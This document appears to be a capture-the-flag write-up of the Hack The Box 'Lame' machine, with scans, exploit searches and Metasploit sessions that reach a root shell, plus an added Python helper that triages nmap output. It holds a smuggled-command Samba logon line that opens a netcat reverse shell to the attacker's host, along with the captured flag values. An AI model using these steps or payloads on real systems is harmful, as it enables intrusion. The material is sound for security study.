ping test
┌──(root💀takudaddy)-[~]
└─# ping 10.10.14.13 (HOST)
PING 10.10.14.13 (10.10.14.13) 56(84) bytes of data.
64 bytes from 10.10.14.13: icmp_seq=1 ttl=64 time=0.029 ms
64 bytes from 10.10.14.13: icmp_seq=2 ttl=64 time=0.023 ms
^C
--- 10.10.14.13 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1023ms
rtt min/avg/max/mdev = 0.023/0.026/0.029/0.003 ms
┌──(root💀takudaddy)-[~]
└─# ping 10.10.10.3 (CLIENT)
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=206 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=206 ms
^C
--- 10.10.10.3 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 205.784/205.872/205.960/0.088 ms
SCANNING
┌──(root💀takudaddy)-[/htb/Lame]
└─# nmap -p- 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 21:38 KST
Nmap scan report for 10.10.10.3
Host is up (0.21s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h05m06s, deviation: 2h49m45s, median: 5m03s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-17T08:42:29-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
vsftpd 2.3.4
smbd 3.0.20
ftp anonymous login
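Added example, not part of the original writeup: a small Python triage helper that parses nmap -sC -sV output in the format shown above and turns it into the same findings the author lists (backdoored vsftpd build, vulnerable Samba release, anonymous FTP, SMB signing off). The embedded scan text is a constructed, trimmed copy of the scan output; the finding descriptions and EDB IDs are the ones quoted on this page.

```python
import re

# Constructed sample: a trimmed copy of the nmap -sC -sV output quoted in the
# writeup above, embedded here so the script runs offline.
NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
|_  message_signing: disabled (dangerous, but default)
"""
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Banners and NSE findings the writeup shows to be exploitable on this host.
VERSION_FINDINGS = {
    "vsftpd 2.3.4": "vsftpd 2.3.4 backdoored build (EDB 17491)",
    "Samba smbd 3.0.20": "Samba 3.0.20 'username map script' RCE (EDB 16320)",
}
SCRIPT_FINDINGS = {
    "Anonymous FTP login allowed": "anonymous FTP login enabled",
    "message_signing: disabled": "SMB message signing disabled",
}

def parse_scan(text):
    """Return {port: {'version': str, 'scripts': [str]}}; NSE lines ('|...')
    attach to the most recent port, host-level script results to port 0."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            current = int(m.group(1))
            ports[current] = {"version": m.group(5).strip(), "scripts": []}
        elif line.startswith("Host script results"):
            current = 0
            ports[current] = {"version": "", "scripts": []}
        elif line.startswith("|") and current is not None:
            ports[current]["scripts"].append(line.lstrip("|_ "))
    return ports

def triage(text):
    """Return sorted (port, finding) pairs that deserve a ticket for this host."""
    found = []
    for port, info in parse_scan(text).items():
        found += [(port, d) for n, d in VERSION_FINDINGS.items() if n in info["version"]]
        for script_line in info["scripts"]:
            found += [(port, d) for n, d in SCRIPT_FINDINGS.items() if n in script_line]
    return sorted(found)
```

Port 0 stands for host-level script results; SSH on 22 is parsed but produces no finding, which is the expected control case.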
┌──(root💀takudaddy)-[~]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> ls -alhR
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.:
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd .
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
vsftpd 2.3.4
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit vsftpd 2.3
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasp | unix/remote/17491.rb
-------------------------------------------------- ---------------------------------
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit -m unix/remote/17491.rb
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /htb/Lame/17491.rb
┌──(root💀takudaddy)-[/htb/Lame]
└─# cat 17491.rb
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
.....
┌──(root💀takudaddy)-[/htb/Lame]
└─# msfconsole -q
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
anonymous
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > anonymous
[-] Unknown command: anonymous.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > exit
smbmap / enum4linux / smbclient
┌──(root💀takudaddy)-[~]
└─# smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
┌──(root💀takudaddy)-[/htb]
└─# smbclient -L //10.10.10.3
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
┌──(root💀takudaddy)-[/htb]
└─# smbclient //10.10.10.3/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
# smbclient //10.10.10.3/tmp
If the connection had succeeded:
smb > ls
If the 'logon' command is available:
smb > logon "./=`nohup nc -e /bin/bash 10.10.14.13 7979`"
Open a listener and the connection comes in.
smbd 3.0.20
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit 3.0.20
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
CubeCart 3.0.20 - '/admin/login.php?goto' Arbitra | php/webapps/36686.txt
CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site R | php/webapps/36687.txt
CubeCart 3.0.20 - Multiple Script 'redir' Arbitra | php/webapps/36685.txt
Maxthon Browser 3.0.20.1000 - ref / replace Denia | windows/dos/16084.html
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Spy Emergency 23.0.205 - Unquoted Service Path Pr | windows/local/40550.txt
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit -m unix/remote/16320.rb
Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16320
Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /htb/Lame/16320.rb
┌──(root💀takudaddy)-[/htb/Lame]
└─# cat 16320.rb
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
┌──(root💀takudaddy)-[/htb/Lame]
└─# msfconsole -q
msf6 > search 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
1 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
........
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf6 exploit(multi/samba/usermap_script) > set LPORT 7979
LPORT => 7979
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.13 yes The listen address (an interface may be specified)
LPORT 7979 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.13:7979
[*] Command shell session 1 opened (10.10.14.13:7979 -> 10.10.10.3:41056) at 2021-04-17 22:14:12 +0900
id
uid=0(root) gid=0(root)
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash
id
id
uid=0(root) gid=0(root)
root@lame:/root# cd /home
cls
d /home
root@lame:/home# ls
ftp makis service user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
0f9c24478ff494f0c5e24665a28fba8d
root@lame:/# cd /root
cd /root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt
cat root.txt
8c522e63645e5004a52c2870941456bf
Done.